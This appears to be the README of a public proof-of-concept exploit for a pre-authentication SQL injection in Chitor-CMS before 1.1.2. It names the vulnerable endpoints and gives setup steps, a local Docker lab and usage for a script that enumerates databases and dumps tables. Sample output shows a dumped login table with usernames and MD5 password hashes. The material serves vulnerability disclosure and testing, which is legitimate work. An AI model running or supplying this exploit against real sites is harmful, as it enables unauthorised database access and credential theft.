Found by msd0pehttps://github.com/waqaskanju/Chitor-CMS
Project by waqaskanju 2023/04/13
SQL Injection was found in the /edit_school.php?id= endpoint and doesn't need any authentication. 2023/04/09
SQL Injections was found in multiple endpoints suchs as /add_school_class.php?school= and doesn't need any authentifcation. Since 5f76192 commit, theses endpoints verify that the logged in user has editing rights. This check was already in place before but was not functional.
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/chitor-sqli
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable
TO START THE VULNERABLE DOCKER:
- sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
- sudo ./clean.shUsage: python chitor1.1.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-u URL, --url=URL target url
--dbs list databases
-D DATABASE, --db=DATABASE
select a database
--tables list tables
-T TABLE, --table=TABLE
select a table
--dump dump the content
Examples:
python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
Source code put in public domain by msd0pe,no Copyright
Any malicious or illegal activity may be punishable by law
Use at your own riskpython3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name | Password | Status |
+----+-------------+------------+----------------------------------+--------+
| 1 | 1 | Guest | adb831a7fdd83dd1e2a309ce7591dff8 | 1 |
| 2 | 2 | waqaskanju | ################################ | 1 |
| 3 | 3 | admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |
+----+-------------+------------+----------------------------------+--------+